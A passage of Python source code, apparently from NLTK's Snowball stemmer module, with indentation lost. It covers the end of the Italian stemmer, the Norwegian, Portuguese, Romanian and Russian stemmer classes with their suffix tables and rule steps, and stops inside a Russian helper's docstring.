if word[i] == "u":
word = "".join((word[:i], "U", word[i+1:]))
elif word [i] == "i":
word = "".join((word[:i], "I", word[i+1:]))
r1, r2 = self._r1r2_standard(word, self.__vowels)
rv = self._rv_standard(word, self.__vowels)
# STEP 0: Attached pronoun
for suffix in self.__step0_suffixes:
if rv.endswith(suffix):
if rv[-len(suffix)-4:-len(suffix)] in ("ando", "endo"):
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
elif (rv[-len(suffix)-2:-len(suffix)] in
("ar", "er", "ir")):
word = suffix_replace(word, suffix, "e")
r1 = suffix_replace(r1, suffix, "e")
r2 = suffix_replace(r2, suffix, "e")
rv = suffix_replace(rv, suffix, "e")
break
# STEP 1: Standard suffix removal
for suffix in self.__step1_suffixes:
if word.endswith(suffix):
if suffix == "amente" and r1.endswith(suffix):
step1_success = True
word = word[:-6]
r2 = r2[:-6]
rv = rv[:-6]
if r2.endswith("iv"):
word = word[:-2]
r2 = r2[:-2]
rv = rv[:-2]
if r2.endswith("at"):
word = word[:-2]
rv = rv[:-2]
elif r2.endswith(("os", "ic")):
word = word[:-2]
rv = rv[:-2]
elif r2 .endswith("abil"):
word = word[:-4]
rv = rv[:-4]
elif (suffix in ("amento", "amenti",
"imento", "imenti") and
rv.endswith(suffix)):
step1_success = True
word = word[:-6]
rv = rv[:-6]
elif r2.endswith(suffix):
step1_success = True
if suffix in ("azione", "azioni", "atore", "atori"):
word = word[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
if r2.endswith("ic"):
word = word[:-2]
rv = rv[:-2]
elif suffix in ("logia", "logie"):
word = word[:-2]
rv = word[:-2]
elif suffix in ("uzione", "uzioni",
"usione", "usioni"):
word = word[:-5]
rv = rv[:-5]
elif suffix in ("enza", "enze"):
word = suffix_replace(word, suffix, "te")
rv = suffix_replace(rv, suffix, "te")
elif suffix == "it\xE0":
word = word[:-3]
r2 = r2[:-3]
rv = rv[:-3]
if r2.endswith(("ic", "iv")):
word = word[:-2]
rv = rv[:-2]
elif r2.endswith("abil"):
word = word[:-4]
rv = rv[:-4]
elif suffix in ("ivo", "ivi", "iva", "ive"):
word = word[:-3]
r2 = r2[:-3]
rv = rv[:-3]
if r2.endswith("at"):
word = word[:-2]
r2 = r2[:-2]
rv = rv[:-2]
if r2.endswith("ic"):
word = word[:-2]
rv = rv[:-2]
else:
word = word[:-len(suffix)]
rv = rv[:-len(suffix)]
break
# STEP 2: Verb suffixes
if not step1_success:
for suffix in self.__step2_suffixes:
if rv.endswith(suffix):
word = word[:-len(suffix)]
rv = rv[:-len(suffix)]
break
# STEP 3a
if rv.endswith(("a", "e", "i", "o", "\xE0", "\xE8",
"\xEC", "\xF2")):
word = word[:-1]
rv = rv[:-1]
if rv.endswith("i"):
word = word[:-1]
rv = rv[:-1]
# STEP 3b
if rv.endswith(("ch", "gh")):
word = word[:-1]
word = word.replace("I", "i").replace("U", "u")
return word
class NorwegianStemmer(_ScandinavianStemmer):
"""
The Norwegian Snowball stemmer.
:cvar __vowels: The Norwegian vowels.
:type __vowels: unicode
:cvar __s_ending: Letters that may directly appear before a word final 's'.
:type __s_ending: unicode
:cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
:type __step1_suffixes: tuple
:cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
:type __step2_suffixes: tuple
:cvar __step3_suffixes: Suffixes to be deleted in step 3 of the algorithm.
:type __step3_suffixes: tuple
:note: A detailed description of the Norwegian
stemming algorithm can be found under
http://snowball.tartarus.org/algorithms/norwegian/stemmer.html
"""
__vowels = "aeiouy\xE6\xE5\xF8"
__s_ending = "bcdfghjlmnoprtvyz"
__step1_suffixes = ("hetenes", "hetene", "hetens", "heter",
"heten", "endes", "ande", "ende", "edes",
"enes", "erte", "ede", "ane", "ene", "ens",
"ers", "ets", "het", "ast", "ert", "en",
"ar", "er", "as", "es", "et", "a", "e", "s")
__step2_suffixes = ("dt", "vt")
__step3_suffixes = ("hetslov", "eleg", "elig", "elov", "slov",
"leg", "eig", "lig", "els", "lov", "ig")
def stem(self, word):
"""
Stem a Norwegian word and return the stemmed form.
:param word: The word that is stemmed.
:type word: str or unicode
:return: The stemmed form.
:rtype: unicode
"""
word = word.lower()
if word in self.stopwords:
return word
r1 = self._r1_scandinavian(word, self.__vowels)
# STEP 1
for suffix in self.__step1_suffixes:
if r1.endswith(suffix):
if suffix in ("erte", "ert"):
word = suffix_replace(word, suffix, "er")
r1 = suffix_replace(r1, suffix, "er")
elif suffix == "s":
if (word[-2] in self.__s_ending or
(word[-2] == "k" and word[-3] not in self.__vowels)):
word = word[:-1]
r1 = r1[:-1]
else:
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
break
# STEP 2
for suffix in self.__step2_suffixes:
if r1.endswith(suffix):
word = word[:-1]
r1 = r1[:-1]
break
# STEP 3
for suffix in self.__step3_suffixes:
if r1.endswith(suffix):
word = word[:-len(suffix)]
break
return word
class PortugueseStemmer(_StandardStemmer):
"""
The Portuguese Snowball stemmer.
:cvar __vowels: The Portuguese vowels.
:type __vowels: unicode
:cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
:type __step1_suffixes: tuple
:cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
:type __step2_suffixes: tuple
:cvar __step4_suffixes: Suffixes to be deleted in step 4 of the algorithm.
:type __step4_suffixes: tuple
:note: A detailed description of the Portuguese
stemming algorithm can be found under
http://snowball.tartarus.org/algorithms/portuguese/stemmer.html
"""
__vowels = "aeiou\xE1\xE9\xED\xF3\xFA\xE2\xEA\xF4"
__step1_suffixes = ('amentos', 'imentos', 'uço~es', 'amento',
'imento', 'adoras', 'adores', 'a\xE7o~es',
'logias', '\xEAncias', 'amente',
'idades', 'an\xE7as', 'ismos', 'istas', 'adora',
'a\xE7a~o', 'antes', '\xE2ncia',
'logia', 'uça~o', '\xEAncia',
'mente', 'idade', 'an\xE7a', 'ezas', 'icos', 'icas',
'ismo', '\xE1vel', '\xEDvel', 'ista',
'osos', 'osas', 'ador', 'ante', 'ivas',
'ivos', 'iras', 'eza', 'ico', 'ica',
'oso', 'osa', 'iva', 'ivo', 'ira')
__step2_suffixes = ('ar\xEDamos', 'er\xEDamos', 'ir\xEDamos',
'\xE1ssemos', '\xEAssemos', '\xEDssemos',
'ar\xEDeis', 'er\xEDeis', 'ir\xEDeis',
'\xE1sseis', '\xE9sseis', '\xEDsseis',
'\xE1ramos', '\xE9ramos', '\xEDramos',
'\xE1vamos', 'aremos', 'eremos', 'iremos',
'ariam', 'eriam', 'iriam', 'assem', 'essem',
'issem', 'ara~o', 'era~o', 'ira~o', 'arias',
'erias', 'irias', 'ardes', 'erdes', 'irdes',
'asses', 'esses', 'isses', 'astes', 'estes',
'istes', '\xE1reis', 'areis', '\xE9reis',
'ereis', '\xEDreis', 'ireis', '\xE1veis',
'\xEDamos', 'armos', 'ermos', 'irmos',
'aria', 'eria', 'iria', 'asse', 'esse',
'isse', 'aste', 'este', 'iste', 'arei',
'erei', 'irei', 'aram', 'eram', 'iram',
'avam', 'arem', 'erem', 'irem',
'ando', 'endo', 'indo', 'adas', 'idas',
'ar\xE1s', 'aras', 'er\xE1s', 'eras',
'ir\xE1s', 'avas', 'ares', 'eres', 'ires',
'\xEDeis', 'ados', 'idos', '\xE1mos',
'amos', 'emos', 'imos', 'iras', 'ada', 'ida',
'ar\xE1', 'ara', 'er\xE1', 'era',
'ir\xE1', 'ava', 'iam', 'ado', 'ido',
'ias', 'ais', 'eis', 'ira', 'ia', 'ei', 'am',
'em', 'ar', 'er', 'ir', 'as',
'es', 'is', 'eu', 'iu', 'ou')
__step4_suffixes = ("os", "a", "i", "o", "\xE1",
"\xED", "\xF3")
def stem(self, word):
"""
Stem a Portuguese word and return the stemmed form.
:param word: The word that is stemmed.
:type word: str or unicode
:return: The stemmed form.
:rtype: unicode
"""
word = word.lower()
if word in self.stopwords:
return word
step1_success = False
step2_success = False
word = (word.replace("\xE3", "a~")
.replace("\xF5", "o~")
.replace("q\xFC", "qu")
.replace("g\xFC", "gu"))
r1, r2 = self._r1r2_standard(word, self.__vowels)
rv = self._rv_standard(word, self.__vowels)
# STEP 1: Standard suffix removal
for suffix in self.__step1_suffixes:
if word.endswith(suffix):
if suffix == "amente" and r1.endswith(suffix):
step1_success = True
word = word[:-6]
r2 = r2[:-6]
rv = rv[:-6]
if r2.endswith("iv"):
word = word[:-2]
r2 = r2[:-2]
rv = rv[:-2]
if r2.endswith("at"):
word = word[:-2]
rv = rv[:-2]
elif r2.endswith(("os", "ic", "ad")):
word = word[:-2]
rv = rv[:-2]
elif (suffix in ("ira", "iras") and rv.endswith(suffix) and
word[-len(suffix)-1:-len(suffix)] == "e"):
step1_success = True
word = suffix_replace(word, suffix, "ir")
rv = suffix_replace(rv, suffix, "ir")
elif r2.endswith(suffix):
step1_success = True
if suffix in ("logia", "logias"):
word = suffix_replace(word, suffix, "log")
rv = suffix_replace(rv, suffix, "log")
elif suffix in ("uça~o", "uço~es"):
word = suffix_replace(word, suffix, "u")
rv = suffix_replace(rv, suffix, "u")
elif suffix in ("\xEAncia", "\xEAncias"):
word = suffix_replace(word, suffix, "ente")
rv = suffix_replace(rv, suffix, "ente")
elif suffix == "mente":
word = word[:-5]
r2 = r2[:-5]
rv = rv[:-5]
if r2.endswith(("ante", "avel", "ivel")):
word = word[:-4]
rv = rv[:-4]
elif suffix in ("idade", "idades"):
word = word[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
if r2.endswith(("ic", "iv")):
word = word[:-2]
rv = rv[:-2]
elif r2.endswith("abil"):
word = word[:-4]
rv = rv[:-4]
elif suffix in ("iva", "ivo", "ivas", "ivos"):
word = word[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
if r2.endswith("at"):
word = word[:-2]
rv = rv[:-2]
else:
word = word[:-len(suffix)]
rv = rv[:-len(suffix)]
break
# STEP 2: Verb suffixes
if not step1_success:
for suffix in self.__step2_suffixes:
if rv.endswith(suffix):
step2_success = True
word = word[:-len(suffix)]
rv = rv[:-len(suffix)]
break
# STEP 3
if step1_success or step2_success:
if rv.endswith("i") and word[-2] == "c":
word = word[:-1]
rv = rv[:-1]
### STEP 4: Residual suffix
if not step1_success and not step2_success:
for suffix in self.__step4_suffixes:
if rv.endswith(suffix):
word = word[:-len(suffix)]
rv = rv[:-len(suffix)]
break
# STEP 5
if rv.endswith(("e", "\xE9", "\xEA")):
word = word[:-1]
rv = rv[:-1]
if ((word.endswith("gu") and rv.endswith("u")) or
(word.endswith("ci") and rv.endswith("i"))):
word = word[:-1]
elif word.endswith("\xE7"):
word = suffix_replace(word, "\xE7", "c")
word = word.replace("a~", "\xE3").replace("o~", "\xF5")
return word
class RomanianStemmer(_StandardStemmer):
"""
The Romanian Snowball stemmer.
:cvar __vowels: The Romanian vowels.
:type __vowels: unicode
:cvar __step0_suffixes: Suffixes to be deleted in step 0 of the algorithm.
:type __step0_suffixes: tuple
:cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
:type __step1_suffixes: tuple
:cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
:type __step2_suffixes: tuple
:cvar __step3_suffixes: Suffixes to be deleted in step 3 of the algorithm.
:type __step3_suffixes: tuple
:note: A detailed description of the Romanian
stemming algorithm can be found under
http://snowball.tartarus.org/algorithms/romanian/stemmer.html
"""
__vowels = "aeiou\u0103\xE2\xEE"
__step0_suffixes = ('iilor', 'ului', 'elor', 'iile', 'ilor',
'atei', 'a\u0163ie', 'a\u0163ia', 'aua',
'ele', 'iua', 'iei', 'ile', 'ul', 'ea',
'ii')
__step1_suffixes = ('abilitate', 'abilitati', 'abilit\u0103\u0163i',
'ibilitate', 'abilit\u0103i', 'ivitate',
'ivitati', 'ivit\u0103\u0163i', 'icitate',
'icitati', 'icit\u0103\u0163i', 'icatori',
'ivit\u0103i', 'icit\u0103i', 'icator',
'a\u0163iune', 'atoare', '\u0103toare',
'i\u0163iune', 'itoare', 'iciva', 'icive',
'icivi', 'iciv\u0103', 'icala', 'icale',
'icali', 'ical\u0103', 'ativa', 'ative',
'ativi', 'ativ\u0103', 'atori', '\u0103tori',
'itiva', 'itive', 'itivi', 'itiv\u0103',
'itori', 'iciv', 'ical', 'ativ', 'ator',
'\u0103tor', 'itiv', 'itor')
__step2_suffixes = ('abila', 'abile', 'abili', 'abil\u0103',
'ibila', 'ibile', 'ibili', 'ibil\u0103',
'atori', 'itate', 'itati', 'it\u0103\u0163i',
'abil', 'ibil', 'oasa', 'oas\u0103', 'oase',
'anta', 'ante', 'anti', 'ant\u0103', 'ator',
'it\u0103i', 'iune', 'iuni', 'isme', 'ista',
'iste', 'isti', 'ist\u0103', 'i\u015Fti',
'ata', 'at\u0103', 'ati', 'ate', 'uta',
'ut\u0103', 'uti', 'ute', 'ita', 'it\u0103',
'iti', 'ite', 'ica', 'ice', 'ici', 'ic\u0103',
'osi', 'o\u015Fi', 'ant', 'iva', 'ive', 'ivi',
'iv\u0103', 'ism', 'ist', 'at', 'ut', 'it',
'ic', 'os', 'iv')
__step3_suffixes = ('seser\u0103\u0163i', 'aser\u0103\u0163i',
'iser\u0103\u0163i', '\xE2ser\u0103\u0163i',
'user\u0103\u0163i', 'seser\u0103m',
'aser\u0103m', 'iser\u0103m', '\xE2ser\u0103m',
'user\u0103m', 'ser\u0103\u0163i', 'sese\u015Fi',
'seser\u0103', 'easc\u0103', 'ar\u0103\u0163i',
'ur\u0103\u0163i', 'ir\u0103\u0163i',
'\xE2r\u0103\u0163i', 'ase\u015Fi',
'aser\u0103', 'ise\u015Fi', 'iser\u0103',
'\xe2se\u015Fi', '\xE2ser\u0103',
'use\u015Fi', 'user\u0103', 'ser\u0103m',
'sesem', 'indu', '\xE2ndu', 'eaz\u0103',
'e\u015Fti', 'e\u015Fte', '\u0103\u015Fti',
'\u0103\u015Fte', 'ea\u0163i', 'ia\u0163i',
'ar\u0103m', 'ur\u0103m', 'ir\u0103m',
'\xE2r\u0103m', 'asem', 'isem',
'\xE2sem', 'usem', 'se\u015Fi', 'ser\u0103',
'sese', 'are', 'ere', 'ire', '\xE2re',
'ind', '\xE2nd', 'eze', 'ezi', 'esc',
'\u0103sc', 'eam', 'eai', 'eau', 'iam',
'iai', 'iau', 'a\u015Fi', 'ar\u0103',
'u\u015Fi', 'ur\u0103', 'i\u015Fi', 'ir\u0103',
'\xE2\u015Fi', '\xe2r\u0103', 'ase',
'ise', '\xE2se', 'use', 'a\u0163i',
'e\u0163i', 'i\u0163i', '\xe2\u0163i', 'sei',
'ez', 'am', 'ai', 'au', 'ea', 'ia', 'ui',
'\xE2i', '\u0103m', 'em', 'im', '\xE2m',
'se')
def stem(self, word):
"""
Stem a Romanian word and return the stemmed form.
:param word: The word that is stemmed.
:type word: str or unicode
:return: The stemmed form.
:rtype: unicode
"""
word = word.lower()
if word in self.stopwords:
return word
step1_success = False
step2_success = False
for i in range(1, len(word)-1):
if word[i-1] in self.__vowels and word[i+1] in self.__vowels:
if word[i] == "u":
word = "".join((word[:i], "U", word[i+1:]))
elif word[i] == "i":
word = "".join((word[:i], "I", word[i+1:]))
r1, r2 = self._r1r2_standard(word, self.__vowels)
rv = self._rv_standard(word, self.__vowels)
# STEP 0: Removal of plurals and other simplifications
for suffix in self.__step0_suffixes:
if word.endswith(suffix):
if suffix in r1:
if suffix in ("ul", "ului"):
word = word[:-len(suffix)]
if suffix in rv:
rv = rv[:-len(suffix)]
else:
rv = ""
elif (suffix == "aua" or suffix == "atei" or
(suffix == "ile" and word[-5:-3] != "ab")):
word = word[:-2]
elif suffix in ("ea", "ele", "elor"):
word = suffix_replace(word, suffix, "e")
if suffix in rv:
rv = suffix_replace(rv, suffix, "e")
else:
rv = ""
elif suffix in ("ii", "iua", "iei",
"iile", "iilor", "ilor"):
word = suffix_replace(word, suffix, "i")
if suffix in rv:
rv = suffix_replace(rv, suffix, "i")
else:
rv = ""
elif suffix in ("a\u0163ie", "a\u0163ia"):
word = word[:-1]
break
# STEP 1: Reduction of combining suffixes
while True:
replacement_done = False
for suffix in self.__step1_suffixes:
if word.endswith(suffix):
if suffix in r1:
step1_success = True
replacement_done = True
if suffix in ("abilitate", "abilitati",
"abilit\u0103i",
"abilit\u0103\u0163i"):
word = suffix_replace(word, suffix, "abil")
elif suffix == "ibilitate":
word = word[:-5]
elif suffix in ("ivitate", "ivitati",
"ivit\u0103i",
"ivit\u0103\u0163i"):
word = suffix_replace(word, suffix, "iv")
elif suffix in ("icitate", "icitati", "icit\u0103i",
"icit\u0103\u0163i", "icator",
"icatori", "iciv", "iciva",
"icive", "icivi", "iciv\u0103",
"ical", "icala", "icale", "icali",
"ical\u0103"):
word = suffix_replace(word, suffix, "ic")
elif suffix in ("ativ", "ativa", "ative", "ativi",
"ativ\u0103", "a\u0163iune",
"atoare", "ator", "atori",
"\u0103toare",
"\u0103tor", "\u0103tori"):
word = suffix_replace(word, suffix, "at")
if suffix in r2:
r2 = suffix_replace(r2, suffix, "at")
elif suffix in ("itiv", "itiva", "itive", "itivi",
"itiv\u0103", "i\u0163iune",
"itoare", "itor", "itori"):
word = suffix_replace(word, suffix, "it")
if suffix in r2:
r2 = suffix_replace(r2, suffix, "it")
else:
step1_success = False
break
if not replacement_done:
break
# STEP 2: Removal of standard suffixes
for suffix in self.__step2_suffixes:
if word.endswith(suffix):
if suffix in r2:
step2_success = True
if suffix in ("iune", "iuni"):
if word[-5] == "\u0163":
word = "".join((word[:-5], "t"))
elif suffix in ("ism", "isme", "ist", "ista", "iste",
"isti", "ist\u0103", "i\u015Fti"):
word = suffix_replace(word, suffix, "ist")
else:
word = word[:-len(suffix)]
break
# STEP 3: Removal of verb suffixes
if not step1_success and not step2_success:
for suffix in self.__step3_suffixes:
if word.endswith(suffix):
if suffix in rv:
if suffix in ('seser\u0103\u0163i', 'seser\u0103m',
'ser\u0103\u0163i', 'sese\u015Fi',
'seser\u0103', 'ser\u0103m', 'sesem',
'se\u015Fi', 'ser\u0103', 'sese',
'a\u0163i', 'e\u0163i', 'i\u0163i',
'\xE2\u0163i', 'sei', '\u0103m',
'em', 'im', '\xE2m', 'se'):
word = word[:-len(suffix)]
rv = rv[:-len(suffix)]
else:
if (not rv.startswith(suffix) and
rv[rv.index(suffix)-1] not in
"aeio\u0103\xE2\xEE"):
word = word[:-len(suffix)]
break
# STEP 4: Removal of final vowel
for suffix in ("ie", "a", "e", "i", "\u0103"):
if word.endswith(suffix):
if suffix in rv:
word = word[:-len(suffix)]
break
word = word.replace("I", "i").replace("U", "u")
return word
class RussianStemmer(_LanguageSpecificStemmer):
"""
The Russian Snowball stemmer.
:cvar __perfective_gerund_suffixes: Suffixes to be deleted.
:type __perfective_gerund_suffixes: tuple
:cvar __adjectival_suffixes: Suffixes to be deleted.
:type __adjectival_suffixes: tuple
:cvar __reflexive_suffixes: Suffixes to be deleted.
:type __reflexive_suffixes: tuple
:cvar __verb_suffixes: Suffixes to be deleted.
:type __verb_suffixes: tuple
:cvar __noun_suffixes: Suffixes to be deleted.
:type __noun_suffixes: tuple
:cvar __superlative_suffixes: Suffixes to be deleted.
:type __superlative_suffixes: tuple
:cvar __derivational_suffixes: Suffixes to be deleted.
:type __derivational_suffixes: tuple
:note: A detailed description of the Russian
stemming algorithm can be found under
http://snowball.tartarus.org/algorithms/russian/stemmer.html
"""
__perfective_gerund_suffixes = ("ivshis'", "yvshis'", "vshis'",
"ivshi", "yvshi", "vshi", "iv",
"yv", "v")
__adjectival_suffixes = ('ui^ushchi^ui^u', 'ui^ushchi^ai^a',
'ui^ushchimi', 'ui^ushchymi', 'ui^ushchego',
'ui^ushchogo', 'ui^ushchemu', 'ui^ushchomu',
'ui^ushchikh', 'ui^ushchykh',
'ui^ushchui^u', 'ui^ushchaia',
'ui^ushchoi^u', 'ui^ushchei^u',
'i^ushchi^ui^u', 'i^ushchi^ai^a',
'ui^ushchee', 'ui^ushchie',
'ui^ushchye', 'ui^ushchoe', 'ui^ushchei`',
'ui^ushchii`', 'ui^ushchyi`',
'ui^ushchoi`', 'ui^ushchem', 'ui^ushchim',
'ui^ushchym', 'ui^ushchom', 'i^ushchimi',
'i^ushchymi', 'i^ushchego', 'i^ushchogo',
'i^ushchemu', 'i^ushchomu', 'i^ushchikh',
'i^ushchykh', 'i^ushchui^u', 'i^ushchai^a',
'i^ushchoi^u', 'i^ushchei^u', 'i^ushchee',
'i^ushchie', 'i^ushchye', 'i^ushchoe',
'i^ushchei`', 'i^ushchii`',
'i^ushchyi`', 'i^ushchoi`', 'i^ushchem',
'i^ushchim', 'i^ushchym', 'i^ushchom',
'shchi^ui^u', 'shchi^ai^a', 'ivshi^ui^u',
'ivshi^ai^a', 'yvshi^ui^u', 'yvshi^ai^a',
'shchimi', 'shchymi', 'shchego', 'shchogo',
'shchemu', 'shchomu', 'shchikh', 'shchykh',
'shchui^u', 'shchai^a', 'shchoi^u',
'shchei^u', 'ivshimi', 'ivshymi',
'ivshego', 'ivshogo', 'ivshemu', 'ivshomu',
'ivshikh', 'ivshykh', 'ivshui^u',
'ivshai^a', 'ivshoi^u', 'ivshei^u',
'yvshimi', 'yvshymi', 'yvshego', 'yvshogo',
'yvshemu', 'yvshomu', 'yvshikh', 'yvshykh',
'yvshui^u', 'yvshai^a', 'yvshoi^u',
'yvshei^u', 'vshi^ui^u', 'vshi^ai^a',
'shchee', 'shchie', 'shchye', 'shchoe',
'shchei`', 'shchii`', 'shchyi`', 'shchoi`',
'shchem', 'shchim', 'shchym', 'shchom',
'ivshee', 'ivshie', 'ivshye', 'ivshoe',
'ivshei`', 'ivshii`', 'ivshyi`',
'ivshoi`', 'ivshem', 'ivshim', 'ivshym',
'ivshom', 'yvshee', 'yvshie', 'yvshye',
'yvshoe', 'yvshei`', 'yvshii`',
'yvshyi`', 'yvshoi`', 'yvshem',
'yvshim', 'yvshym', 'yvshom', 'vshimi',
'vshymi', 'vshego', 'vshogo', 'vshemu',
'vshomu', 'vshikh', 'vshykh', 'vshui^u',
'vshai^a', 'vshoi^u', 'vshei^u',
'emi^ui^u', 'emi^ai^a', 'nni^ui^u',
'nni^ai^a', 'vshee',
'vshie', 'vshye', 'vshoe', 'vshei`',
'vshii`', 'vshyi`', 'vshoi`',
'vshem', 'vshim', 'vshym', 'vshom',
'emimi', 'emymi', 'emego', 'emogo',
'ememu', 'emomu', 'emikh', 'emykh',
'emui^u', 'emai^a', 'emoi^u', 'emei^u',
'nnimi', 'nnymi', 'nnego', 'nnogo',
'nnemu', 'nnomu', 'nnikh', 'nnykh',
'nnui^u', 'nnai^a', 'nnoi^u', 'nnei^u',
'emee', 'emie', 'emye', 'emoe',
'emei`', 'emii`', 'emyi`',
'emoi`', 'emem', 'emim', 'emym',
'emom', 'nnee', 'nnie', 'nnye', 'nnoe',
'nnei`', 'nnii`', 'nnyi`',
'nnoi`', 'nnem', 'nnim', 'nnym',
'nnom', 'i^ui^u', 'i^ai^a', 'imi', 'ymi',
'ego', 'ogo', 'emu', 'omu', 'ikh',
'ykh', 'ui^u', 'ai^a', 'oi^u', 'ei^u',
'ee', 'ie', 'ye', 'oe', 'ei`',
'ii`', 'yi`', 'oi`', 'em',
'im', 'ym', 'om')
__reflexive_suffixes = ("si^a", "s'")
__verb_suffixes = ("esh'", 'ei`te', 'ui`te', 'ui^ut',
"ish'", 'ete', 'i`te', 'i^ut', 'nno',
'ila', 'yla', 'ena', 'ite', 'ili', 'yli',
'ilo', 'ylo', 'eno', 'i^at', 'uet', 'eny',
"it'", "yt'", 'ui^u', 'la', 'na', 'li',
'em', 'lo', 'no', 'et', 'ny', "t'",
'ei`', 'ui`', 'il', 'yl', 'im',
'ym', 'en', 'it', 'yt', 'i^u', 'i`',
'l', 'n')
__noun_suffixes = ('ii^ami', 'ii^akh', 'i^ami', 'ii^am', 'i^akh',
'ami', 'iei`', 'i^am', 'iem', 'akh',
'ii^u', "'i^u", 'ii^a', "'i^a", 'ev', 'ov',
'ie', "'e", 'ei', 'ii', 'ei`',
'oi`', 'ii`', 'em', 'am', 'om',
'i^u', 'i^a', 'a', 'e', 'i', 'i`',
'o', 'u', 'y', "'")
__superlative_suffixes = ("ei`she", "ei`sh")
__derivational_suffixes = ("ost'", "ost")
def stem(self, word):
"""
Stem a Russian word and return the stemmed form.
:param word: The word that is stemmed.
:type word: str or unicode
:return: The stemmed form.
:rtype: unicode
"""
if word in self.stopwords:
return word
chr_exceeded = False
for i in range(len(word)):
if ord(word[i]) > 255:
chr_exceeded = True
break
if chr_exceeded:
word = self.__cyrillic_to_roman(word)
step1_success = False
adjectival_removed = False
verb_removed = False
undouble_success = False
superlative_removed = False
rv, r2 = self.__regions_russian(word)
# Step 1
for suffix in self.__perfective_gerund_suffixes:
if rv.endswith(suffix):
if suffix in ("v", "vshi", "vshis'"):
if (rv[-len(suffix)-3:-len(suffix)] == "i^a" or
rv[-len(suffix)-1:-len(suffix)] == "a"):
word = word[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
step1_success = True
break
else:
word = word[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
step1_success = True
break
if not step1_success:
for suffix in self.__reflexive_suffixes:
if rv.endswith(suffix):
word = word[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
break
for suffix in self.__adjectival_suffixes:
if rv.endswith(suffix):
if suffix in ('i^ushchi^ui^u', 'i^ushchi^ai^a',
'i^ushchui^u', 'i^ushchai^a', 'i^ushchoi^u',
'i^ushchei^u', 'i^ushchimi', 'i^ushchymi',
'i^ushchego', 'i^ushchogo', 'i^ushchemu',
'i^ushchomu', 'i^ushchikh', 'i^ushchykh',
'shchi^ui^u', 'shchi^ai^a', 'i^ushchee',
'i^ushchie', 'i^ushchye', 'i^ushchoe',
'i^ushchei`', 'i^ushchii`', 'i^ushchyi`',
'i^ushchoi`', 'i^ushchem', 'i^ushchim',
'i^ushchym', 'i^ushchom', 'vshi^ui^u',
'vshi^ai^a', 'shchui^u', 'shchai^a',
'shchoi^u', 'shchei^u', 'emi^ui^u',
'emi^ai^a', 'nni^ui^u', 'nni^ai^a',
'shchimi', 'shchymi', 'shchego', 'shchogo',
'shchemu', 'shchomu', 'shchikh', 'shchykh',
'vshui^u', 'vshai^a', 'vshoi^u', 'vshei^u',
'shchee', 'shchie', 'shchye', 'shchoe',
'shchei`', 'shchii`', 'shchyi`', 'shchoi`',
'shchem', 'shchim', 'shchym', 'shchom',
'vshimi', 'vshymi', 'vshego', 'vshogo',
'vshemu', 'vshomu', 'vshikh', 'vshykh',
'emui^u', 'emai^a', 'emoi^u', 'emei^u',
'nnui^u', 'nnai^a', 'nnoi^u', 'nnei^u',
'vshee', 'vshie', 'vshye', 'vshoe',
'vshei`', 'vshii`', 'vshyi`', 'vshoi`',
'vshem', 'vshim', 'vshym', 'vshom',
'emimi', 'emymi', 'emego', 'emogo',
'ememu', 'emomu', 'emikh', 'emykh',
'nnimi', 'nnymi', 'nnego', 'nnogo',
'nnemu', 'nnomu', 'nnikh', 'nnykh',
'emee', 'emie', 'emye', 'emoe', 'emei`',
'emii`', 'emyi`', 'emoi`', 'emem', 'emim',
'emym', 'emom', 'nnee', 'nnie', 'nnye',
'nnoe', 'nnei`', 'nnii`', 'nnyi`', 'nnoi`',
'nnem', 'nnim', 'nnym', 'nnom'):
if (rv[-len(suffix)-3:-len(suffix)] == "i^a" or
rv[-len(suffix)-1:-len(suffix)] == "a"):
word = word[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
adjectival_removed = True
break
else:
word = word[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
adjectival_removed = True
break
if not adjectival_removed:
for suffix in self.__verb_suffixes:
if rv.endswith(suffix):
if suffix in ("la", "na", "ete", "i`te", "li",
"i`", "l", "em", "n", "lo", "no",
"et", "i^ut", "ny", "t'", "esh'",
"nno"):
if (rv[-len(suffix)-3:-len(suffix)] == "i^a" or
rv[-len(suffix)-1:-len(suffix)] == "a"):
word = word[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
verb_removed = True
break
else:
word = word[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
verb_removed = True
break
if not adjectival_removed and not verb_removed:
for suffix in self.__noun_suffixes:
if rv.endswith(suffix):
word = word[:-len(suffix)]
r2 = r2[:-len(suffix)]
rv = rv[:-len(suffix)]
break
# Step 2
if rv.endswith("i"):
word = word[:-1]
r2 = r2[:-1]
# Step 3
for suffix in self.__derivational_suffixes:
if r2.endswith(suffix):
word = word[:-len(suffix)]
break
# Step 4
if word.endswith("nn"):
word = word[:-1]
undouble_success = True
if not undouble_success:
for suffix in self.__superlative_suffixes:
if word.endswith(suffix):
word = word[:-len(suffix)]
superlative_removed = True
break
if word.endswith("nn"):
word = word[:-1]
if not undouble_success and not superlative_removed:
if word.endswith("'"):
word = word[:-1]
if chr_exceeded:
word = self.__roman_to_cyrillic(word)
return word
def __regions_russian(self, word):
"""
Return the regions RV and R2 which are used by the Russian stemmer.
In any word, RV is the region after the first vowel,
or the end of the word if it contains no vowel.
R2 is the region after the first non-vowel following
a vowel in R1, or the end of the word if there is no such non-vowel.
R1 is the region after the first non-vowel following a vowel,
or the end of the word if there is no such non-vowel.
:param word: The Russian word whose regions RV and R2 are determined.
:type word: str or unicode
:return: the regions RV and R2 for the respective Russian word.
:rtype: tuple
